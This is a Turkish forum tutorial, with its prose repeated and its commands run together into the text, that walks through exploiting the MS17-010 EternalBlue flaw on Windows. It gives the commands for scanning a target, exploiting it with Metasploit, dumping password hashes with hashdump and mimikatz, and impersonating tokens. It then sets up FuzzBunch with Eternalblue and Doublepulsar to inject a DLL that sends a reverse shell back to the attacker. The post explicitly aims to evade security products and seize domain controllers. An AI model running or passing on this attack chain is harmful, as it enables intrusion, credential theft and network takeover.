Şimdi şey anlatcağım Bu zafiyet metasploit modulu vardır " exploit/windows/smb/ms17_010_eternalblue " ama metasploit popüler bir araç olduğundan dolayı güvenlik ürünleri tarafından yakalanabiliyor . Üstelik sadece x64 sistemlerde işe yarıyor . Kurumlarda otomatik değilde manuel tercih ediliyor bu yüzden .
İlk olarak bi giriş yapabilim düşük seviyeden
Şimdi NSE ile MS17-010 zafiyetinin olup olmadığını test edceğiz jedef ip de .
Terminalimizi açıp başlıyalım
İp adresinde tarama sonucunda VULNERABLE yazısı çıktıysa zafiyet bulunmaktadır demektir. nse dışında metasploitte auxiliary/scanner/smb/smb_ms17_010 modülü ilede kontrol edebilirsiniz . Şimdi metasploiti açalım ve bu zafiyette bir şeyler deniyelim 
METASPLOİT imizi açalım .
modüle giriş yaptık
ile bakalım
Orda exploit target kısmında sadece x64 var gördüğünüz gibi .
evet
diyelim ve meterpreter satırına düşelim . shell ile cmd satırınada düşebilirsiniz windowsta yetkili kullanıcı ile sisteme giriş yaptığımızdan dolayı hash ve parolalarıda çıkarabilirz. hemen deniyelim mesela
diyerek server username öğreniriz .
diyelim karşımıza hashlar gelcek
diyerek mimikatz yüklüyelim
seccess aldıktan sonra
şimdi
yazalım
şimdi
diyerek yüklüyelim .
yüklendikten sonra
burda yazdığımız WIN-E2S1BSJMUKE\\root i list_tokens -u çektiğimizde çıkan token lerde \root olanı kopyalayıp yazıyoruz .
şimdi tekrar
çekip kontrol edelim şimdi biz burda ne yaptık meterpreter üzerinde hushdump ve mimikatz araçlarını kullandık ve kullanıcı hash ve parolalarını ele geçirdik . incoginito ile kullanıcı tokenları arasında değiştirebildik .
bu zafiyet ile sisteme sızıp sonrada kurum içindeki - domaindeki makinelerde hash - password ile bağlanıp otomatik olarak ele geçirmeyi öğrendik bu hash ve parolalar topladıkça domain admin yetkileri ile çalışan bilgilere rastlıyabiliriz . makinelerde elimzide demektir bu yetkiler ile kullanıcılara ulaşıp DC makinelarını alabilirz. Bu güvenlik ürünleri tarafından engellendiğinde fuzzbunch ile önüne geçebiliriz. x64 ve x86 sistemlerinde birçok güvenlik ürünlerine takılmadan başarı ile çalışır.
şimdi debian kurulumunu yapalim
şimdi Wİndows Xp ye ihtiyaç duymaktan kurtularak bir makine ile saldırıyı gerçekleştirebiliriz eğer bu olmaydı Windows XP ye ihtiyaç duyucaktık
Şimdi fb.py dosyamızı açtık
yazarak projectimize isim verip target(sızılcak ip) Callback (bizim ip) bilgileri girerek varsayılan değerler ile onaylıyoruz . biz eternalblue exploiyini kullancağız bu yüzden
diyoruz . 
Burda ne görüyorsanız aynı değerleri girin amk hiç değiştirmeyin .
diyerek exploiti tamamlıyalım . Hedef makinemiz x64 bit olduğunu varsayarak zaten tek x64 var
diyoruz ve ping komutunu çalıştırıyoruz şimdi DLL Functionu çalıştırıp Dll üretip hedef sistemde çalıştırıp shell atabilirz. Msfvenom ile x64 bir dll üretelim ve bunu fuzzbunchun kurulu olduğu yere taşıyalım . bunu anlatmıcağım hepiniz biliyorsunuz diye var sayıyorum . mv komutu ilede taşırsınız örnek =
şimdi
diyerek functionımızı seçtik Dll ordinal ve Dll payload değişkenlerini gireceğiz Örnek =
payloadımızada kurulu olduğu yer yani
evet değerleri girdik şimdi
diyerek Doublepulsarı çalıştırdık .
Doublepulsar’ı çalıştırmadan önce DLL’i oluştururken kullandığımız IP adresli makinada multi/handler modülü ile IP ve port numarasını dinlemeye başlıyoruz. Doublepulsar başarılı bir şekilde çalıştığında hedef makinadan shell gelmektedir.
Konu çok uzamasın diye fazla detaya girmiyorum işte MSFVenom yerine empire ile dll oluşturma vs bu işinizi görür .
İlk olarak bi giriş yapabilim düşük seviyeden
Şimdi NSE ile MS17-010 zafiyetinin olup olmadığını test edceğiz jedef ip de .
Terminalimizi açıp başlıyalım
Kod:
nmap -p445 --script smb-vuln-ms17-010 172.13.125.154METASPLOİT imizi açalım .
Kod:
use exploit/windows/smb/ms17_010_eternalblue
Kod:
show optionsOrda exploit target kısmında sadece x64 var gördüğünüz gibi .
evet
Kod:
exploit
Kod:
getuid
Kod:
hashdump
Kod:
load mimikatzseccess aldıktan sonra
Kod:
mimikatz_command -f samdump: :hashes
Kod:
kerberosşimdi
Kod:
use incognitoyüklendikten sonra
Kod:
list_tokens -u
Kod:
impersonate_token WIN-E2S1BSJMUKE\\rootşimdi tekrar
Kod:
getuidbu zafiyet ile sisteme sızıp sonrada kurum içindeki - domaindeki makinelerde hash - password ile bağlanıp otomatik olarak ele geçirmeyi öğrendik bu hash ve parolalar topladıkça domain admin yetkileri ile çalışan bilgilere rastlıyabiliriz . makinelerde elimzide demektir bu yetkiler ile kullanıcılara ulaşıp DC makinelarını alabilirz. Bu güvenlik ürünleri tarafından engellendiğinde fuzzbunch ile önüne geçebiliriz. x64 ve x86 sistemlerinde birçok güvenlik ürünlerine takılmadan başarı ile çalışır.
şimdi debian kurulumunu yapalim
Kod:
1- apt update
2- apt install wine winbind winetricks
3- dpkg –add-architecture i386 && apt-get update && apt-get install wine32
4- WINEPREFIX=”$HOME/.wine-fuzzbunch” WINEARCH=win32 wine wineboot
5- export WINEPREFIX=$HOME/.wine-fuzzbunch
6- wine regedit.exe
7- regedit açıldıktan sonra sağa tıklayıp Add String Value diyerek Type kısmına String Name kısmına PATH Value kısmına c:\\windows;c:\\windows\\system;C:\\Python26;C:\\fuzzbunch-debian\\windows\\fuzzbunch değerlerini girerek çıkıyoruz.
8- cd $HOME/.wine-fuzzbunch/drive_c
9- git clone https://github.com/mdiazcl/fuzzbunch-debian.git
10- winetricks python26
11- cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
12- wine cmd.exe
13- python fb.pyŞimdi fb.py dosyamızı açtık
Kod:
0
Kod:
use EternalblueBurda ne görüyorsanız aynı değerleri girin amk hiç değiştirmeyin .
Kod:
use Doublepulsar
Kod:
1
Kod:
mv /root/destkop/deneme.dll /root/.winde-fuzzbunch/drive_c/fuzzbunch-debian/
Kod:
set Function RunDLL
Kod:
set DLLOrdinal 5
Kod:
set DLLPayload Z:\root\.wine-fuzzbunch\drive_c\deneme.dll
Kod:
executeDoublepulsar’ı çalıştırmadan önce DLL’i oluştururken kullandığımız IP adresli makinada multi/handler modülü ile IP ve port numarasını dinlemeye başlıyoruz. Doublepulsar başarılı bir şekilde çalıştığında hedef makinadan shell gelmektedir.
Konu çok uzamasın diye fazla detaya girmiyorum işte MSFVenom yerine empire ile dll oluşturma vs bu işinizi görür .
